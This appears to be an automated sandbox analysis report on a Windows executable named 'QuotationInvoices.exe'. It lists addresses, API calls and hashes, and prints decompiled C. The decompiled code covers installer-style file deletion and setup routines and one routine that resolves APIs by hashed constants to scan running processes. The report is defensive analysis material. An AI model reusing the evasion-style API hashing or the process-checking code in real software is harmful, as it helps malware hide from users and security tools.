0x6fc51e72
0x6fc51e77
0x6fc51e79
0x6fc51e7b
0x6fc51e7f
0x6fc51e85
0x6fc51e8b
0x6fc51e8b
0x6fc51e8d
0x6fc51e8d
0x6fc51e8e
0x6fc51e8e
0x6fc51e92
0x6fc51e98
0x6fc51e9a
0x6fc51e9e
0x6fc51ea3
0x6fc51ea3
0x6fc51ea5
0x6fc51ea5
0x6fc51ea8
0x6fc51eab
0x6fc51eb4
0x6fc51eb7
0x6fc51eba
0x6fc51eba
0x6fc51ebc
0x6fc51ebf
0x6fc51ec5
0x6fc51ecb
0x6fc51ecb
0x6fc51ecd
0x00000000
0x00000000
0x6fc51ed3
0x6fc51ed3
0x6fc51ed7
0x6fc51ede
0x6fc51f02
0x6fc51f02
0x6fc51f06
0x6fc51f08
0x6fc51f0b
0x6fc51f0b
0x6fc51f0e
0x6fc51f0e
0x00000000
0x6fc51f06
0x6fc51ee3
0x6fc51ee6
0x6fc51ee6
0x6fc51eed
0x6fc51eef
0x6fc51ef2
0x6fc51ef9
0x6fc51efa
0x6fc51f00
0x6fc51f00
0x00000000
0x6fc51f00
0x6fc51ef4
0x6fc51ef7
0x00000000
0x00000000
0x00000000
0x6fc51ef7
0x6fc51e87
0x6fc51e89
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc51df5
0x6fc51c9b
0x6fc51c9b
0x6fc51c9c
0x6fc51ddb
0x00000000
0x6fc51ddb
0x6fc51ca2
0x6fc51ca3
0x00000000
0x00000000
0x6fc51ca9
0x6fc51cac
0x6fc51da0
0x6fc51da0
0x6fc51da3
0x6fc51db8
0x6fc51dba
0x6fc51dba
0x6fc51dbb
0x6fc51dbe
0x6fc51dc1
0x6fc51dcd
0x6fc51dcd
0x6fc51dcd
0x6fc51dc3
0x6fc51dc3
0x6fc51dc3
0x6fc51dd3
0x00000000
0x6fc51dd3
0x6fc51da5
0x6fc51da5
0x6fc51da6
0x6fc51db4
0x00000000
0x6fc51db4
0x6fc51da9
0x6fc51daa
0x00000000
0x00000000
0x6fc51db0
0x00000000
0x6fc51db0
0x6fc51cb2
0x6fc51d9c
0x00000000
0x6fc51d9c
0x6fc51cb8
0x6fc51cb8
0x6fc51cbb
0x6fc51ce4
0x00000000
0x6fc51ce4
0x6fc51cbd
0x6fc51cbd
0x6fc51cc0
0x6fc51cda
0x00000000
0x6fc51cda
0x6fc51cc2
0x6fc51cc2
0x6fc51cc5
0x6fc51cd4
0x00000000
0x6fc51cd4
0x6fc51cc8
0x6fc51cc9
0x00000000
0x00000000
0x6fc51ccb
0x00000000
0x6fc51b83
0x6fc51b83
0x6fc51b86
0x00000000
0x6fc51b86
0x6fc51b7d
0x6fc51b6b
0x6fc51b6f
0x00000000
0x00000000
0x6fc51b71
0x6fc51b74
0x00000000
0x00000000
0x00000000
0x6fc51b74
0x6fc51b05
0x6fc51b08
0x6fc51b3e
0x6fc51b41
0x00000000
0x6fc51b47
0x6fc51b49
0x6fc51b4d
0x6fc51b54
0x6fc51b5b
0x6fc51b5e
0x6fc51b61
0x00000000
0x6fc51b61
0x6fc51b41
0x6fc51b0a
0x6fc51b0b
0x6fc51b26
0x6fc51b29
0x00000000
0x6fc51b2f
0x6fc51b2f
0x6fc51b36
0x6fc51b39
0x00000000
0x6fc51b39
0x6fc51b29
0x6fc51b10
0x00000000
0x6fc51b16
0x6fc51b16
0x6fc51b1d
0x00000000
0x6fc51b1d
0x6fc51b10
0x6fc51d09
0x6fc51d0e
0x6fc51d13
0x6fc51d17
0x6fc521c6
0x6fc521cc
0x6fc51d29
0x6fc51d2b
0x6fc51d2c
0x6fc520f1
0x6fc520f1
0x6fc520f4
0x6fc520f7
0x6fc52114
0x6fc5211a
0x6fc5211c
0x6fc52122
0x6fc52139
0x6fc52139
0x6fc52139
0x6fc52146
0x6fc5214c
0x6fc5214f
0x6fc52155
0x6fc52157
0x6fc5215a
0x6fc5215c
0x6fc52163
0x6fc52168
0x6fc5216b
0x6fc5216d
0x6fc52172
0x6fc52184
0x6fc52184
0x6fc52172
0x6fc5216b
0x6fc5215a
0x6fc5218a
0x6fc5218d
0x6fc52197
0x6fc5219f
0x6fc521ab
0x6fc521b1
0x6fc521b4
0x6fc520e6
0x6fc520e6
0x00000000
0x6fc520e6
0x6fc521ba
0x6fc521c0
0x6fc521c0
0x00000000
0x00000000
0x6fc521c2
0x6fc521c2
0x6fc521c2
0x6fc521c2
0x00000000
0x6fc5218f
0x6fc5218f
0x6fc52195
0x00000000
0x00000000
0x00000000
0x6fc52195
0x6fc5218d
0x6fc52125
0x6fc5212b
0x6fc5212d
0x6fc52133
0x00000000
0x00000000
0x00000000
0x6fc52133
0x6fc520f9
0x6fc52100
0x6fc52106
0x6fc5210c
0x00000000
0x6fc5210c
0x6fc51d32
0x6fc51d33
0x6fc520d0
0x6fc520d0
0x6fc520d6
0x6fc520d9
0x00000000
0x00000000
0x6fc520e0
0x6fc520e5
0x00000000
0x6fc520e5
0x6fc51d3a
0x00000000
0x00000000
0x6fc51d40
0x6fc51d40
0x6fc51d49
0x6fc51d4e
0x6fc51d54
0x00000000
0x00000000
0x6fc51d5a
0x6fc51d67
0x6fc51d6d
0x6fc51d77
0x6fc51d7d
0x6fc51d85
0x6fc51d95
0x00000000
0x6fc51d95

APIs

Part of subcall function 6FC51215: GlobalAlloc.KERNEL32(00000040,6FC51233,?,6FC512CF,-6FC5404B,6FC511AB,-000000A0), ref: 6FC5121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 6FC51BC4
lstrcpyA.KERNEL32(00000008,?), ref: 6FC51C0C
lstrcpyA.KERNEL32(00000408,?), ref: 6FC51C16
GlobalFree.KERNEL32 ref: 6FC51C29
GlobalFree.KERNEL32 ref: 6FC51D09
GlobalFree.KERNEL32 ref: 6FC51D0E
GlobalFree.KERNEL32 ref: 6FC51D13
GlobalFree.KERNEL32 ref: 6FC51EFA
lstrcpyA.KERNEL32(?,?), ref: 6FC52098
GetModuleHandleA.KERNELBASE(00000008), ref: 6FC52114
LoadLibraryA.KERNELBASE(00000008), ref: 6FC52125
GetProcAddress.KERNEL32(?,?), ref: 6FC5217E
lstrlenA.KERNEL32(00000408), ref: 6FC52198

Memory Dump Source

Source File: 00000000.00000002.667341894.000000006FC51000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: true

Associated: 00000000.00000002.667322660.000000006FC50000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667363580.000000006FC53000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667372496.000000006FC55000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 2edae6e182b274bd83beeb5f8dfe4ad4c87240dc0a4153c6b1d824de18668546
Instruction ID: 56200910129a6cd82e74b7dc4ed0939ecb5a6abaa29aa11d5237185e99bc7298
Opcode Fuzzy Hash: 2edae6e182b274bd83beeb5f8dfe4ad4c87240dc0a4153c6b1d824de18668546
Instruction Fuzzy Hash: 5B229EB194420A9EDB108FBDC9987EEBBF0FF06314F20462ED161E6180E77469B5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00405A15, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405A15(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD3(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4e8 =  *0x42f4e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624D(0x42b8c0, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C2C(_t73);
					} else {
						lstrcatA(0x42b8c0, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b8c0,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C10( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E0040624D(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059CD(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405374(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4e8 =  *0x42f4e8 + 1;
										} else {
											E00405374(0xfffffff1, _t73);
											E0040602C(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A15(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b8c0 - 0x5c;
					if( *0x42b8c0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065C1(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE5(_t73);
							_t40 = E004059CD(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405374(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405374(0xfffffff1, _t73);
							return E0040602C(_t72, _t73, 0);
						}
						L33:
						 *0x42f4e8 =  *0x42f4e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x00405a1f
0x00405a24
0x00405a2d
0x00405a30
0x00405a38
0x00405a3b
0x00405a3e
0x00405a46
0x00405a48
0x00405a49
0x00000000
0x00405a49
0x00405a54
0x00405a57
0x00405a57
0x00405a57
0x00405a5b
0x00405a6e
0x00405a75
0x00405a7a
0x00405a7e
0x00405a8e
0x00405a80
0x00405a86
0x00405a86
0x00405a93
0x00405a96
0x00405aa1
0x00405aa7
0x00405aac
0x00405abc
0x00405abe
0x00405ac4
0x00405ac7
0x00405aca
0x00405b82
0x00405b82
0x00405b86
0x00405b88
0x00405b88
0x00405b88
0x00405b88
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ad0
0x00405ad0
0x00405ad9
0x00405adf
0x00405ae4
0x00405ae7
0x00405ae9
0x00405aed
0x00405aef
0x00405aef
0x00405aed
0x00405af2
0x00405af5
0x00405b08
0x00405b0a
0x00405b0f
0x00405b16
0x00405b31
0x00405b36
0x00405b38
0x00405b5c
0x00405b3a
0x00405b3a
0x00405b3d
0x00405b51
0x00405b3f
0x00405b42
0x00405b4a
0x00405b4a
0x00405b3d
0x00405b18
0x00405b1e
0x00405b20
0x00405b26
0x00405b26
0x00405b20
0x00000000
0x00405b16
0x00405af7
0x00405afa
0x00405afc
0x00000000
0x00000000
0x00405afe
0x00405b00
0x00000000
0x00000000
0x00405b02
0x00405b06
0x00000000
0x00000000
0x00000000
0x00405b61
0x00405b6b
0x00405b71
0x00405b71
0x00405b7c
0x00000000
0x00405b7c
0x00405a98
0x00405a9f
0x00000000
0x00000000
0x00000000
0x00405a5d
0x00405a5d
0x00405a5f
0x00405b8c
0x00405b8e
0x00405b91
0x00405be2
0x00405be2
0x00405be2
0x00405b93
0x00405b96
0x00405ba1
0x00405ba6
0x00405ba8
0x00000000
0x00000000
0x00405bab
0x00405bb7
0x00405bbc
0x00405bbe
0x00000000
0x00405bd9
0x00405bc0
0x00405bc3
0x00000000
0x00000000
0x00405bc8
0x00000000
0x00405bcf
0x00405b98
0x00405b98
0x00000000
0x00405b98
0x00405a65
0x00405a68
0x00000000
0x00000000
0x00000000
0x00405a68

APIs

DeleteFileA.KERNELBASE(?,?,73BCFA90,73BCF560,00000000), ref: 00405A3E
lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405A86
lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AA7
lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405AAD
FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,73BCFA90,73BCF560,00000000), ref: 00405ABE
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
FindClose.KERNEL32(00000000), ref: 00405B7C

Strings

\*.*, xrefs: 00405A80
"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 00405A15

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\QuotationInvoices.exe" $\*.*
API String ID: 2035342205-2778088967
Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69

Uniqueness

Uniqueness Score: -1.00%

Function 10004243, Relevance: 3.1, APIs: 2, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E10004243(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				char _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E100074AD();
				_v16 = E10007555(_v8, 0xea31d3b6);
				_v20 = E10007555(_v8, 0x5c7bf6e9);
				_v24 = E10007555(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E100041FF( &_v544) != _a4) {
							_push( &_v580);
							_push(_v12);
							if(_v24() != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x10004251
0x10004261
0x10004271
0x10004281
0x1000428b
0x10004292
0x10004298
0x100042a2
0x100042ac
0x100042b1
0x100042b7
0x100042d3
0x100042d4
0x100042dc
0x00000000
0x00000000
0x00000000
0x100042de
0x00000000
0x100042ca
0x00000000
0x100042b3
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004288
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 100042AC

Memory Dump Source

Source File: 00000000.00000002.667292789.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.667275361.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667281974.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.667287022.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667308042.0000000010008000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 3408db18699c0addea5f5073398f89ead7cbe00703c29ee00fffa264cf48be91
Instruction ID: 7827a78d98bb96ab8b2cacb121d1dcfc5e15c7d2b64bc2ff6cb532443483cb94
Opcode Fuzzy Hash: 3408db18699c0addea5f5073398f89ead7cbe00703c29ee00fffa264cf48be91
Instruction Fuzzy Hash: C9112AB4E1011DBEEB10DFB0CC49AEDBBB8FF00380F5145A5F918E1154EB709A519A55

Uniqueness

Uniqueness Score: -1.00%

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}

0x004065cc
0x004065d5
0x00000000
0x004065e2
0x004065d8
0x00000000

APIs

FindFirstFileA.KERNELBASE(73BCFA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,73BCFA90,?,73BCF560,00405A35,?,73BCFA90,73BCF560), ref: 004065CC
FindClose.KERNEL32(00000000), ref: 004065D8

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a66
0x00403a6f
0x00403a76
0x00403a78
0x00403a8c
0x00403a9e
0x00403aa5
0x00403aac
0x00403ab2
0x00403ab7
0x00403abd
0x00403ad0
0x00403ad0
0x00403adb
0x00403a7a
0x00403a85
0x00403a85
0x00403ae0
0x00403aea
0x00403af3
0x00403af8
0x00403b09
0x00403b90
0x00403b98
0x00403ba1
0x00403ba1
0x00403bb7
0x00403bbd
0x00403bcb
0x00403c4c
0x00403c54
0x00403c5e
0x00403c63
0x00403c69
0x00403cf3
0x00403cf8
0x00403cfa
0x00403d16
0x00000000
0x00403d16
0x00403cfc
0x00403d02
0x00403d0a
0x00403d0a
0x00000000
0x00403d02
0x00403c77
0x00403c82
0x00403c87
0x00403c89
0x00403c90
0x00403c90
0x00403c9b
0x00403ca3
0x00403ca5
0x00403ca7
0x00403cb0
0x00403cb3
0x00403cb9
0x00403cb9
0x00403cbf
0x00403cd8
0x00403ce9
0x00000000
0x00403cee
0x00403c56
0x00403c58
0x00000000
0x00403bcd
0x00403bcd
0x00403bd9
0x00403be3
0x00403be9
0x00403bee
0x00403bfd
0x00403d1b
0x00403d1b
0x00000000
0x00403d1b
0x00403c0c
0x00403c47
0x00000000
0x00403c47
0x00403b0f
0x00403b0f
0x00403b12
0x00403b14
0x00000000
0x00000000
0x00403b1e
0x00403b2e
0x00403b33
0x00403b3a
0x00000000
0x00000000
0x00403b3e
0x00403b40
0x00403b4d
0x00403b4d
0x00403b55
0x00403b5b
0x00403b83
0x00403b8b
0x00000000
0x00403b6d
0x00403b6e
0x00403b77
0x00403b7d
0x00403b7e
0x00000000
0x00403b7e
0x00403b79
0x00403b7b
0x00000000
0x00000000
0x00000000
0x00403b7b
0x00403b5b

APIs

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QuotationInvoices.exe" ,00000000), ref: 00403ADB
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,73BCFA90), ref: 00403B50
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
LoadImageA.USER32 ref: 00403BB7

Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8

RegisterClassA.USER32 ref: 00403BF4
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
CreateWindowExA.USER32 ref: 00403C41
ShowWindow.USER32(00000005,00000000), ref: 00403C77
GetClassInfoA.USER32 ref: 00403CA3
GetClassInfoA.USER32 ref: 00403CB0
RegisterClassA.USER32 ref: 00403CB9
DialogBoxParamA.USER32 ref: 00403CD8

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00403AEA, 00403AF2, 00403B8A, 00403B90, 00403BA0
RichEd32, xrefs: 00403C8B
"C:\Users\user\Desktop\QuotationInvoices.exe" , xrefs: 00403A64
RichEd20, xrefs: 00403C7D
B, xrefs: 00403BC6
1033, xrefs: 00403A80, 00403AD6
.DEFAULT\Control Panel\International, xrefs: 00403AC6
Control Panel\Desktop\ResourceLocale, xrefs: 00403A94
_Nb, xrefs: 00403BD3, 00403C3B
RichEdit20A, xrefs: 00403C9B, 00403CA1
RichEdit, xrefs: 00403CAA
Call, xrefs: 00403B1E, 00403B26, 00403B33, 00403B7D, 00403B83
.exe, xrefs: 00403B5D
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A65

Memory Dump Source

Source File: 00000000.00000002.665386128.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.665371835.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665435897.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665469747.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665525375.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665561077.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665587795.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.665608924.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\QuotationInvoices.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
